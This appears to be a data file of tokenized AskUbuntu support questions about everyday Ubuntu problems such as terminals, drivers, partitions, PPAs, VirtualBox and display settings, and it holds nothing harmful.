114856	terminal does not start ; how to fix it ?	when i try to start the terminal ( applications - > accessories - > terminal ) , it does not start . i get a `` starting terminal '' entry in the taskbar . after a few seconds , it goes away . no terminal appears . ( other applications launch correctly . ) i 'm running ubuntu 11.04 , and connecting via remote desktop . ( on the client , i 'm using microsoft 's remote desktop connection for mac ; on the server , sesman . ) i 've checked the following log files , but no messages appear : debug , messages , sesman.log , syslog , and user.log . ps ax | grep -i term does not list the terminal -- not even when the taskbar shows `` starting terminal '' . ( i can still get a command line by sssh'ing in . ) what should i do ? i 'm at a loss about how to diagnose and fix the problem . update thanks for all the good suggestions . when i launch gnome-terminal from xterm , i get the error below . i 'm not sure what to do about the error , though . gnome-terminal : /build/buildd/cairo-1.10.2/src/cairo-image-surface.c:1320 : _pixel_to_solid : assertion ` ! `` reached '' ' failed . as for other terminals , i get the same error message when i run byobu terminal . and guake did n't install properly from the software centre ( fixing guake seems beyond the scope of this question ) . however , xterm runs ok. also , i checked my .bashrc file , and it seems fine . what should i do now ? i 'd rather not use xterm as my primary terminal . update 2 forgot to check the google before posting ... this is apparently a known issue . the solution is to turn on a desktop background .
114858	how to convert image to cmyk in gimp ?	i am supposed to send some artwork to the printers tomorrow and their guidelines requires it to be cmyk . i have installed the plugin separate+ from the 'gimp-plugin-registy ' package . i have also installed some icc colour profiles from the 'icc-profiles ' package . when i try to use the separate+ plugin all i can get it to output is an image that looks like the original but with the colours inverted . how can i convert my image to cmyk ?
114859	change icons in unity 2d	i have tried getting icons in ubuntu 12.04 2d , by putting them in the /.icons folder and using `` ubuntu tweak tool '' . it does n't work ( this did n't work in 11.10 either so i think it is n't a bug ) . they do n't show up in the icons drop down menu . i was wondering if there was any other way to activate an icon theme . if it uses terminal could you tell me instructions using the `` faenza theme '' . also the same problem happened trying to install a theme but i am very happy with 12.04 's ambiance .
114861	pictures wo n't upload from android htc rezound	i have a htc rezound and none of my pictures will upload auto . the cloud folder was created but no pictures tranfer auto-upload is enabled and set for instanly . force upload does not work either . i am able to go to the gallery and manualy send 1 at a time to the cloud . i love this app but really want this to work
114872	how can i get h.264 support ?	canonical limited is shown as a licensee of h.264 . i am interested in being able to play h.264 video online when using the chrome web-browser in ubuntu ( and in the future on firefox when firefox supports h.264 ) . is h.264 support enabled on self-installs of ubuntu ? if not , is there some way i can buy h.264 support for my ubuntu install ? assume a scenario where i self-installed ubuntu on a computer that came pre-installed with windows os . i 'd like to know any and all options available to me for getting h.264 to work on ubuntu .
114874	printing in using echo	i ca n't printing in ubuntu 11.10 with the follow command : echo 'it 's working ' > /dev/usblp0 but in ubuntu 11.04 works fine , i 'm using an usb to parallel cable converter , my printer is epson , and the old version of ubuntu this command works very well , but in ubuntu 11.10 it is not working . what can i do ?
114886	hp 6735s brightness hotkey problem ; where is brightness panel ?	i have installed ubuntu 11.10 on my laptop hp 6735s . the screen is often too dark and i want to make it brighter , although the hotkeys fn+f7/f8 are not working . i have tried some things : firstly it appears that sometimes they are in fact working , after reboot they either work and continue to do so or they do n't . i 've read about a brightness applet ; but where can i find or install it ? i have tried some grub options ; acpi_osi=linux and acpi_backlight=vendor but nothing changes . i do n't want to add another question but since it might be related : my laptop also gets quite hot , i 'm having doubts whether ubuntu connects to the available sensors and cooling plans ( or how does it work ? ? ? ) ; sensors ( or psensor ) only shows 2 sensors both named temp1 . any help is greatly appreciated ! paul
114890	networking and wireless disabled on boot	on my lenovo x121e running ubuntu 11.10 , i find that both nerworking and wireless are disabled in network manager 's menu every time i boot the system . this is a recent feature , it used to work .
114893	where can i get those tips back that appear during installation ?	if you 've installed ubuntu yourself , you most probably remember that little `` tour '' offered during the installation . now being someone who recommends ubuntu to a lot of users who have never tried linux before , i 'd like to make those tips that were shown available to them , so they can have a look at it . i remember there were some really nice tips like those about askubuntu when you need to ask a question , or ubuntu one to sync your files . these are just a few examples that new users are interested in , but when they start their ubuntu , there 's nothing telling them `` hey , did you know you can do this and that ? '' if it 's not possible to get these tips , do you know anything else that new users could use to `` discover '' their new os ? thank you in advance for the tips !
114894	how do i disable pop-up windows ?	ubuntu displays a variety of pop-up windows ( including keyring manager , update manager , upgrading windows , etc. ) . i would like to not have any pop-ups on my screen . is there a general way to disable all of them ?
114895	how can a gamepad control the mouse ?	there are many questions about this subject : remapping both mouse and keyboard to a gamepad how do i configure a joystick or gamepad ? how to control the mouse pointer via my keyboard ? ... but the purpose of these questions/answers is to be able to use the gamepad for playing a game . i would like a solution to use the gamepad to control the mouse . to replace the mouse by the gamepad in all applications . that way i could control my computer in the living-room from my couch with a wireless gamepad .
114903	problems installing ubuntu server and desktop	google translate good afternoon i 'm new to linux , i have to install a proxy and to them i decided on ubuntu , the problem is that it took several days trying to install ubuntu on any version and when installing i get error [ errno 5 ] input / output error says that is because the disc ( cd or dvd ) is bad or faulty change it and save all denuevo but i get the same error try changing the hard drive to see if my drive had no problem and i also get the same error , the machine where i want to mount the ubuntu is a p4 with 1gb ram and 40gb disk is more than the minimum requirements for even so i get the error ... i would like someone could help me thank you very much ... .. original problemas al instalar ubuntu server y desktop buenas tardes soy nuevo en linux , tengo que instalar un proxy y para ellos me decidi por ubuntu , el problema es que llevo varios dias tratando de instalar ubuntu en cualquiera de sus versiones y al momento de instalar me sale error [ errno 5 ] input/output error dice que se debe a que el disco ( cd o dvd ) esta malo o defectuoso lo cambie y grabe todo denuevo pero me sale el mismo error trate de cambiar el disco duro para ver si no tenia problema mi disco y tambien me sale el mismo error , la maquina donde quiero montar el ubuntu es un p4 con 1gb ram y disco de 40gb , es mas de los requerimientos minimos por aun asi me sale el error ... me gustaria que alguien me pudiera ayudar muchas gracias ... ..
114906	how to ignore eclipse workspace .metadata folder in ubuntu one ?	i 'm a eclipse 's user and i want synchronize my workspace on ubuntu one . the problem is because the eclipse creates a metadata inside of workspace , this meta have some configurations of computer that use this program . so , when i sync my workspace folder , this meta go with all my projects , and when i download it in another computer , ubuntu one overrides the meta folder and crashes my eclipse . there is some way of share a folder on ubuntu one , but eliminate some internal folders ?
114908	firefox aurora 13 and flash plugin problem	i have a problem when using aurora 13 i ca n't install flash plugin player whenever i tried to install it , it said that my aurora firefox will be removed anyone can help
114912	how do i manually install the package selections presented in tasksel ?	if you forgot to select some software at the `` software selection '' screen on a fresh install , what are the commands to install them after the fact . i know you can install them manually at anytime after everything is said and done , but what are the commands to install just as if you [ * ] starred them on that screen . for instance : sudo apt-get install lamp-server^ will install the lamp server . what are the commands for the dns server , mail server and tomcat java server ?
114913	ubuntu software centre issue ( unity 11.10 ) after broken sun-java6-jre package installation	i have been installing software packages from usc and i am getting the following error message . worked fine one minute then the message below . tried to search but could n't find a solution previously i was installing the sun-java6-jre package in terminal and had an connection outage and it didnt complete . i attempted an apt-get -f install with no success . i dont know what to try next . i 'm relatively new to linux . the answer provided with a similar question on this site didnt resolve the issue for meclick on this link an unhandlable error occured there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . details file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the sun-java6-jre package . this might mean you need to manually fix this package . terminal output link http : //dl.dropbox.com/u/48466855/terminal % 20output.odt
114917	boot failure on ubuntu 11.04	i was using my laptop with ubuntu without problem for a few months . i did not update any software or install any os updates . this morning when it started , i got error : no such device : ... . error : no such disk error : you need to load the kernel first . press any key to continue ... then takes me back to grub menu . both ubuntu option and recovery mode option show the same thing ( above ) . what does this mean ? how do i fix it ? since i did not install anything new , does it mean the ssd is dying ( again ) ? how to check the ssd to and fix any file system errors ? ubuntu 11.04 edit : just remembered something : when the system was shutting down , it did not turn off . there were a bunch of weird output statements , and i assumed the system had shut down so i turned it off with the power button . perhaps something got corrupted because of that .
114927	how often should i update my beta installation ?	i just installed the 12.04 beta1 . when i start the update manager it detects more than 500 packages to be updated , 25 to be added and 6 to be removed . i wonder if i will get a more stable system with these in `` beta development '' updates or if i should wait for beta2 ?
114928	update manager not working fail to download repository information	when i try to update , i get this error : failed to download your repository information check your internet connection w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 4874d3686e80c6b7 , w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
114945	how do i get a netgear wnda3100v2 working ?	i have ubuntu 11.10 on my desktop . a month ago i bought linksys ae1000 adapter , i did not check that it 's not working on ubuntu and because i 've lost receipt i 'm stuck with it . last week i bought netgear adapter and this time i did check and it meant to be plug an play but it was not . i have checked many forums and managed to install software , system does sees adapter but it 's not connecting to network . i have found that it may not like wpa so i have created my own password-letters and digits , no spaces-still nothing.i do n't understand why . this is my next attempt with linux and i 'm not with it background so it takes time and research before i can resolve something but i really want to learn . i so wish to learn on ubuntu.one day , i 've checked fedora16 and my old linksys ae1000 worked without any instalations .
114947	nokia 5800 is not recognized in win7 virtual box	i 've just installed win7 in ubuntu , and i 'd like to connect my phone and use it in win7 . when the phone is connected , nothing happens in the win7 virtual box . how come it wont recognize it ? thanks .
114948	why did ubuntu install break out my partitions ?	i have a 750gb hard disk with windows 7 installed . so i shrunk the c : drive to about 80 gb , created two more partitions , one for data ( about 615gb ) , one for ubuntu ( 30gb ) ( extended partition ) . i ran gparted , created a 8.5 gb swap partition inside ubuntu partition , and left whatever to ubuntu root partition . so i went to install ubuntu . after a few tries , everything worked . but now , i noticed some puzzling facts . here are the output of a few commands : $ df filesystem 1k-blocks used available use % mounted on /dev/sda7 5333936 4472688 590300 89 % / udev 4043640 4 4043636 1 % /dev tmpfs 1621024 864 1620160 1 % /run none 5120 0 5120 0 % /run/lock none 4052552 200 4052352 1 % /run/shm /dev/sda4 599041020 213046820 385994200 36 % /home $ sudo parted -l model : ata toshiba mk7559gs ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 26.8gb 26.8gb primary fat32 hidden , lba 2 26.8gb 105gb 78.4gb primary ntfs boot 3 105gb 137gb 31.5gb extended 5 105gb 114gb 8913mb logical linux-swap ( v1 ) 7 114gb 120gb 5549mb logical ext4 8 120gb 128gb 8496mb logical linux-swap ( v1 ) 6 128gb 137gb 8496mb logical linux-swap ( v1 ) 4 137gb 750gb 613gb primary ntfs in df output , / has only about 5gb , and in parted output , there are two more partions ( number 6 and 8 ) of 8gb each . i do n't remember i ever created them . what are they ? are these disk space being wasted ? how can i reclaim them ? help is greatly appreciated . thanks in advance .
114953	how do i demand a password on single user mode ?	i have learned that i can boot into single user mode ( or whatever it 's called ) by hitting ctrl+e in the grub2 menu and adding single to the correct line in the boot script . this is all good - it 's saved me a bunch of times when i screwed something up : p however , i 've noticed that when i do this , i get root access basically for free - i never have to enter a password or otherwise prove my identity . this feels unsafe - the keyboard command to edit the boot script is common knowledge , so anyone with access to my computer can just turn it off ( forcibly , if needed , via the power button ) and on again , edit the boot script and have root access to my computer . i do n't want that . what do i need to configure in order to force a password for single user sessions ? ( i'ts probably not relevant , but i 've set my startup options so that i boot straight into the desktop , skipping the login screen . this is ok , since i still need to type a password to sudo , but i do n't like the idea of giving anyone root access that easily ... )
114955	ralink rt3090 driver installed and wireless does n't work on ubuntu 10.04	i have a lg a-410 lap-top ( 64 bits ) with rt 3090 wireless card . searching the problem i discover that i already have a rt 3090-dkms installed , but my wireless does n't work . *-network unclaimed description : network controller product : rt3090 wireless 802.11n 1t/1r pcie vendor : ralink physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : e5400000-e540ffff
114958	reboot to fail safe mode when root file system is full	i have a system running on a 4gb nandrive . when the drive is full , ubuntu will not boot : ( and i have to plug in a rescue thumbdrive to delete files . the problem is the hardware is not easily accessible except via network . is there a sure-fire way to boot ubuntu , say , to ram or other means when the disk is full or on any other errors in the normal boot process ? in other words , is there a fallback rescue boot mode with networking ? thanks for any advice .
114969	is there any faster way to remove a directory than `` rm -rf '' ?	i have a folder that has many files and `` rm -rf '' takes a lot of time to complete . is there any faster way to remove a directory and it 's contents ( subdirs , etc ) ?
114971	ipv6 auto configuration not working	in windows 7 , my computer can automatically get a ipv6 global address and use ipv6 network , but in ubuntu natty , i ca n't find out how to let stateless configuration work . my network is a university campus network , so i do n't need tunnels . i think if one thing can silently and successfully be accomplished in windows , it should n't be impossible in linux . i tried manually editing /etc/network/interfaces and used a static ipv6 address , and i can use ipv6 this way , but i just want to use auto-configuration . i found this post : http : //superuser.com/questions/33196/how-to-disable-autoconfiguration-on-ipv6-in-linux and tried sudo sysctl -w net.ipv6.conf.all.autoconf=1 sudo sysctl -w net.ipv6.conf.all.accept_ra=1 but without any luck . i got this in dmesg : root @ natty-150 : ~ # dmesg |grep ipv6 [ 26.239607 ] eth0 : no ipv6 routers present [ 657.365194 ] eth0 : no ipv6 routers present [ 719.101383 ] eth0 : no ipv6 routers present [ 32864.604234 ] eth0 : no ipv6 routers present [ 33267.619767 ] eth0 : no ipv6 routers present [ 33341.507307 ] eth0 : no ipv6 routers present i am not sure whether it matters , but then i setup a static ipv6 address ( with gateway ) and restart network , i ping6 ipv6.google.com and the ipv6 network is fine.this time a entry was added in dmesg [ 33971.214920 ] eth0 : no ipv6 routers present so i guess the complain of no ipv6 router does not matter ? here is the ipv6 forwarding setting.but i guessed forwarding is used for radvd stuff ? root @ natty-150 : / # cat /proc/sys/net/ipv6/conf/eth0/forwarding 0 after ajmitch mentioned forwarding setting , i added this to sysctl.conf file : net.ipv6.conf.all.autoconf = 1 net.ipv6.conf.all.accept_ra = 1 net.ipv6.conf.default.forwarding = 1 net.ipv6.conf.lo.forwarding = 1 net.ipv6.conf.eth0.forwarding = 1 and then ran sysctl -p /etc/init.d/networking restart but this still does n't work .
114973	gui not showing after installation of 11.10 on virtual machine	steps i did 1 . ) specs of vm 512mb ram 20gb hd 1core 2 . ) open iso on vm 3 . ) specify username and password 4 . ) boot 5 . ) select english 6 . ) reboot after install 7 . ) the prompt told me that the ui is being installed 8 . ) after installation i was directed to the commandline prompt
114975	hide debug information when running apps from the command line	most of the time running a gtk application from the command line it starts dumping debug information to the stdout even though i put them in background . example : ~ $ gedit test.html # and ctrl+z to suspend zsh : suspended gedit .zshrc ~ $ bg [ 1 ] + continued gedit .zshrc ~ $ # do some editing ( gedit:6208 ) : gtksourceview-warning ** : could not find word to remove in buffer ( whoosh ) , this should not happen ! ( gedit:6208 ) : gtksourceview-warning ** : could not find word to remove in buffer ( haystack ) , this should not happen ! i want to note that the error , or warning , changes according to what i 'm doing at the moment . the gtksourceview-warning shown here is one of the cases . anyway ... do you know if it 's at all possible to avoid getting that information printed out ?
114982	how do you enable wobbly windows in ubuntu 11.04 without using compiz ?	i 'm curious if there 's a way to enable the more fun ui features in ubuntu 11.04 that were available in previous versions . the effects i 'm most curious about is the wobbly windows and the alt tab program switcher that looked like a rolodex . those things were delightful . i 've been reading about the compiz tool and since i 'm a pretty noob user , i do n't think i want to risk destroying my desktop for a chance to get these effects back . any help would be appreciated . thanks
114985	difference between ubuntu and xubuntu when deploy to server ?	when deployed to a server ( or via a vps/cloud provider ) what is the post install difference between ubuntu and xubuntu server ( no x components , no wm ) ? thanks
114986	how to grep output of ls -lhr / for particular owner ( ex . root ) ?	is there anyway i can list all the files that belong to a particular owner ? additionally can i list all the files that belong to a group ?
114990	lost right-click open with java - jar file	how do i setup unity to right-click-open a java file ? i have tried to `` set the default action '' but the action is not listed and i can not add an action from the menus . when i right-click-properties then click the `` open with '' tab , the `` add '' button is greyed out . i write alot of java software . i need the ability to open it from the desktop .
114991	is it possible to run the gnome user manager from xfce4 ?	if i run 'gnome-control-center ' and click on the 'user accounts ' icon , the gnome-control-center crashes . i built it from source to see what 's going on , and it turns out it 's doing a if ( strcmp ( getenv ( `` xdg_current_desktop '' ) , `` gnome '' ) ) in panels/user-accounts/um-password-dialog.c , line 690 . i do n't have an environment variable `` xdg_current_desktop '' , so the getenv is returning null , and the strcmp is segfaulting where is xdg_current_desktop meant to be defined ? and should n't gnome-control-center check the pointer returned by getenv before passing it to strcmp ? does xfce4 have its own 'user accounts ' tool for creating new users ? edit : i was asked in a comment to run this : chris @ chris : ~ $ env | grep xdg xdg_menu_prefix=xfce- xdg_session_cookie=eeeeeeeeaaaaaaaa2222222200000000-1111111122.555544-444444448 xdg_session_path=/org/freedesktop/displaymanager/session0 xdg_seat_path=/org/freedesktop/displaymanager/seat0 xdg_config_dirs=/etc/xdg/xdg-xfce : /etc/xdg : /etc/xdg xdg_data_dirs=/usr/share/xfce : /usr/local/share/ : /usr/share/ : /usr/share chris @ chris : ~ $
114992	how do i refresh disk utility ?	i do a lot of live system building , which eventually involves imaging a usb drive with the built binary image : dd if=binary.img of=/dev/sdx sync where /dev/sdx is a usb drive . as part of my workflow , i like to have ubuntu 's disk utility open so i can verify the drive letter and unmount anything that gets mounted automatically . i also use it to create extra partitions for persistence . the trouble is , after writing the image to the device â and even after the sync operation â disk utility does n't show the new partition . it just shows free space . gparted sees it and fdisk sees it . even after closing and opening disk utility , it still shows only free space . if i click `` safe removal '' and physically unplug and replug the usb drive , disk utility will then see the partition . why do i need to remove and re-insert the drive for disk utility to see the partitions on it ? can i force disk utility to update its information without needing to do this ? ( using disk utility 3.0.2 under ubuntu 11.10 . )
114993	update manager reports ~2gb of updates after changing some settings	how do i reset the update manager settings so then i can make a small update ? i was configuring the settings and now the update manager finds 1.9gb of updates , and that 's too much for my internet connection . it did find 200mb before , but then i was just messing around with the settings and that happened .
114997	how/where do i check my ubuntu laptops 's cpu usage ?	how/where do i check my ubuntu laptops 's cpu usage ? i want to check it but i do n't know where ... . thank you
114999	how do i uninstall ubuntu os ( used ubuntu for windows ) ?	i wanted to try out ubuntu , but i really do n't like it . how do i delete/uninstall and revert back to my previous windows 7 ?
115002	vertical scrolling and multitouch not working for sony e series	i have a sony vaio vpceh18fg laptop , and i 've been using ubuntu 11.04 . but the vertical scrolling and multi-touch is not working in spite of enabling in the system settings . can something be done to solve this ?
115004	ca n't get unity to work on virtualbox ubuntu 11.10/12.04b guest	i have n't been able to get 3d acceleration to work properly on my vbox guest , no matter what i do i always get fallback unity 2d mode , here 's what i 've tried : enabled `` 3d acceleration '' on vbox settings , set video memory all the way to 128mb . installed vbox guest additions , checked to see if there was any guest additions pre-installed first , it did n't throw any errors enabled `` oracle virtualbox guest additions for linux module '' in `` additional drivers '' ran `` unity -- replace '' nothing seems to work , i 'm using vbox 4.1.10 . the guest additions seem to work partially though , before i install them if i maximize my ubuntu guest window it does n't resize up but after installing them the desktop does resize correctly but i 'm stuck in unity 2d ( i also tried installing gnome-shell and it also threw me in fallback mode ) anyone knows what could be wrong ? thanks in advance ! edit : looks like it 's not a problem with unity but virtualbox , i tried with mint , arch and debian and all des switched me to fallback mode
115009	unable to play dvds	i 'm a newbie , and i 've installed the restricted extras package but i still cant play a dvd . is there a way to trouble shoot the problem or is there any important codecs that i 've missed ?
115014	are there search and dictionary panel applets available for unity ?	is there a search applet like os x 's and is there a dictionary applet like in xubuntu and kubuntu ? if so , how do i get them ? by applets , i mean the ones on the panel
115018	ca n't remove ppa	i installed the ppa for a detailed battery applet which wo n't install nor update . so i decided to remove the ppa and i installed ppa purge and when i put in sudo ppa-purge ppa : iaz/battery-status , i get this : updating packages lists w : failed to fetch http : //ppa.launchpad.net/fredp/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/fredp/ppa/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/fredp/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/iaz/battery-status/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/iaz/battery-status/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/iaz/battery-status/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . warning : apt-get update failed for some reason ppa to be removed : iaz battery-status warning : could not find package list for ppa : iaz battery-status how do i fix this ?
115023	users command lists 5 of the same users ... is this normal ?	so if i type users from the cli it lists : user user user user user if i recall correctly , i 've never had that many . is this normal ?
115029	what is each logged in user doing ?	to expand on this question : users command lists 5 of the same users ... what are they doing ? how can i track down what each user is doing or what service/app/request spawned another login of that user ? edit : http : //askubuntu.com/a/115028/38901 answer from the previous post offers the solution of using who which is useful to see where the user is . still , any way to see what ?
115034	debugging : console output and upstart scripts	how do you send the output of an upstart script to a terminal so to find tracebacks in python code ? it 's taking me for ever to do things without trace-backs that used to take just a second . i 'm having to place several file write calls to track down errors . what took second to find before with a traceback is turning in to several minutes minutes . this is miserable . this has been going on for a few weeks now and i 'm sick of it . would some speak up on this please . i feel like i 'm using assembly without a debugger again .
115039	acer aspire installation of ubuntu as the one and only os	i am quite sick of a win7 limited edition that was pre-installed on my acer aspire one 533 . i want to have ubuntu as the only os on this little thing . i have tested ubuntu on a pretty unstable system and i am simply in love with it , despite the fact that i am still on the learning path . so my questions is how do i format/erase all previous info , including windows files ? i am interested in a real cleanup of the drives rather than just a re-partitioning , because i travel every now and then and i want to prevent any personal data remaining on the drives for anyone with recovery knowledge to sniff through . thanks in advance for your input and advice . a .
115046	is a supported version of avast for 64 bit laptops ?	i have been trying to install avast for a while on a 64 bit system ... but it only seems to support 32 bit systems . is there any way to make it work though ? thanks .
115049	my unity in settings	some time ago i installed my unity , which is unofficial unity configurator . everything was normal until yesterday , when the system , after the update , chosen my unity for one part of settings . why ?
115051	dual monitor , with a low resolution projector	i need to show a presentaion to a conference tomorrow . today i tryed my ubuntu 10.04 with the projector . my notebook has a resolution of 1440x960 , the projector seems to have a really lower resolution . however , thanks to nvidia-settings i configured my video card ( a nvidia 9800 ) , it works with other display , but not with the projector . i found the projector , configured as twin-view , resolution auto and pressed on apply , then `` save to x configuration '' . on projector is visualized just a quarter of my notebook display . i tryed also to reduce my resolution and to change the resolution of projector , but i obtained no better results . how can i solve it ? on windows all goes well , but i need ubuntu for personal reasons . thanks in advance
115052	define a policykit action for upstart	i 'm trying to get some user to start , stop and reload services by using the udev upstart interface . i 'm using ubuntu 10.04 . i created the file /usr/share/polkit-1/actions/com.ubuntu.upstart0_6.job.policy < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype policyconfig public `` -//freedesktop//dtd policykit policy configuration 1.0//en '' `` http : //www.freedesktop.org/standards/policykit/1.0/policyconfig.dtd '' > < policyconfig > < vendor > uxitic < /vendor > < vendor_url > http : //citius.usc.es/ < /vendor_url > < icon_name > gdm < /icon_name > < action id= '' com.ubuntu.upstart0_6.job.stop '' > < _description > stops a service < /_description > < _message > privileges are required to stop a service. < /_message > < defaults > < allow_inactive > no < /allow_inactive > < allow_active > auth_admin_keep < /allow_active > < /defaults > < /action > < /policyconfig > and also the corresponding authority file /etc/polkit-1/localauthority/50-local.d/10-allow-users-to-start-and-stop-services.pkla [ stop services ] identity=unix-user : jorge action=com.ubuntu.upstart_0.6.job.stop resultany=no resultinactive=no resultactive=auth_self but when i try to stop a service , i get access denied : ( jorge $ dbus-send -- print-reply -- system -- dest=com.ubuntu.upstart /com/ubuntu/upstart/jobs/ssh com.ubuntu.upstart0_6.job.stop array : string : '' boolean : true error org.freedesktop.dbus.error.accessdenied : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.452 '' ( uid=1021 pid=28234 comm= '' dbus-send ) interface= '' com.ubuntu.upstart0_6.job '' member= '' stop '' error name= '' ( unset ) '' requested_reply=0 destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) )
115053	install ubuntu on a partitioned hdd with free space	i have a hdd , which has 3 ntfs logical partitions . i use this hdd only for storage , because i have a ssd for the boot drive . now , among with the 3 logical partitions , i have some free , unallocated space on the hdd : i will extend the free space to aprox ~10gb . the question : will i be able to install ubuntu on the free space , without affecting the ntfs partitions ?
115061	unable to mount ntfs partition after resizing	i was having only 15 gb space allocated to linux . i wanted to have more space available to linux . so i just re sized one of my ntfs partition using gparted . but after resizing i am not able to open the partition neither in ubuntu nor in windows . os : dual boot win7/ubuntu 10.10 the error message i get is the following : error mounting : mount exited with exit code 12 : failed to read last sector ( 395458824 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sda5 ' : invalid argument the device '/dev/sda5 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ?
115067	installation of graphical desktop changes kernel ?	i 've a ubuntu server 11.10 amd64 installation that needed a graphical desktop to execute some visual apps . while searching for the correct way to achieve this , i noticed that there are a lot of people saying that invoking the gnome desktop installation ( apt-get install ubuntu-desktop ) would switch from server to desktop kernel . is this true ! ? i 've checked and the kernel seems to remain unchanged after the install . i need to be sure of this because the desktop flavoured kernel does n't seem to support the serveraid 8k controller sitting on my ibm server and i have no idea on how to enable support for it . ( i 'll be grateful if someone could point me a good guide on how to install ubuntu when the storage controller is not detected ) any comment on this matter will be greatly appreciated ! good linuxing !
115068	bad md5sum error when trying to customize ubuntu-keyring-udeb	i have been trying to customize ubuntu 8.04 ( hardy heron ) alternate install cd . i have followed the community documentation at https : //help.ubuntu.com/community/installcdcustomization # generating_a_new_ubuntu-keyring_.deb_to_sign_your_cd to rebuild the ubuntu-keyring packages . but when the media boots i get a warning : anna [ 7581 ] : warning ** : bad md5sum . though i have not been able to confirm that the message is for the ubuntu-keyring-udeb package , the nearest debconf adding [ package ] message is for ubuntu-keyring-udeb . this is followed by : input critical retriever/cdrom/error . this message is already from syslog . i do n't think dpkg.log will help in this case . i have tried modifying the md5sum file within the source package manually and signing it with my own public key , before building it . but that has not helped either . how do get the installer to work in this scenario ? alternatively , can i customize the contents of ubuntu 8.04 without signing anything ?
115069	volume control applet does n't work , but alsamixer does !	my volume control applet and the `` sound preferences '' / `` output volume '' does n't work ( it does n't affect the volume ) . alsamixer on the other hand works . any ideas of what could cause this ? ( running natty with gnome 2.32 )
115072	how to install ubuntu on acer 4752 ?	how to install ubuntu on my laptop ? ? i 'm trying to install ubuntu `` ubuntu-11.10-desktop-i386 '' on my laptop.. : ) here is my specs.. : manufacturer : acer model : aspire 4752 os : windows 7 cpu/ram : 2.401 ghz / 3936 mb video card : nvidia geforce gt 520m sound card : realtek high definition audio intel ( r ) display audio any ideas ? ? ... thanks , regards ,
115079	how does the update manager determine when to prompt users ?	versions of ubuntu that are not yet released ( pre-alpha/alpha/beta/rc ) do n't seem to notify when updates are available . stable releases notify me on occasion until i dismiss them and then come back , but i ca n't figure out when . how does the update manager determine when to prompt users ?
115080	vlc playback issue	so i am playing an mp4 video with h.264 encoding . when i run it ubuntu with vlc exactly at one point the playback quality becomes really bad , and i can see squares , and the picture is very unclear . but when i play the same video in windows , it works fine . what gives ? digvijay
115083	how do i update banshee to 2.4 ?	i currently have banshee 2.2.1 and i want 2.4 on ubuntu 11.10 . i have run sudo add-apt-repository ppa : banshee-team/ppa in terminal , followed by : sudo apt-get upgrade sudo apt-get update but banshee is still not updated to 2.4 . i also tried : sudo apt-get remove banshee sudo apt-get install banshee and that gets me back to version 2.2.1 .
115086	installed xmonad , broke gnome desktop	i installed xmonad a couple of nights ago . xmonad includes the files that you would need select it from gdm ( e.g . /usr/share/applications/xmonad.desktop and /usr/share/xsessions/xmonad.desktop ) . i tried starting xmonad via gdm and locked up x ... ( eventually even the virtual terminals locked up and i had to reboot the machine ) . the next time i started the machine i selected gnome instead of xmonad , it launched gnome-session , but tried to run xmonad instead of metacity as the desktop environment ( this was entirely unusable ) . i moved the xmonad.desktop files in both /usr/share/applications and /usr/share/xsessions , now i have no desktop environment ( which is slightly usable ) . how do i re-enable metacity ?
115088	3 displays ubuntu , ati radeon	there are lots of questions on this but i 've read them all and none helped me ! ati radeon hd 5400 series pci express 2.0 my co-worker attempted to use 3 displays on windows , that failed ... however he managed to get 3 displays on ubuntu using the exact same graphics card as me ! i know its possible ! display one : 22 '' dvi display two : 22 '' vga display three : 19 '' vga my graphics card has : hdmi , dvi , vga . the hdmi goes to display one using a hdmi to dvi converter the vga goes to display two directly the dvi goes to display three using a dvi to vga converter when i open ubuntu display settings , i see the 3 displays , however display three is set to off by default ... when i try to enable it , my pc does nothing ! when i open catalyst control center , i see the 3 displays again , but the 3rd is set to `` disabled '' and i can not enable it ... what do i need to do ?
115090	virtual machine , mouse cursor only works within the box	i am experimenting with virtual box . one of my problems is that the mouse cursor only works within the box . how can i make it work both with the actual os too and the virtual box at the same time ?
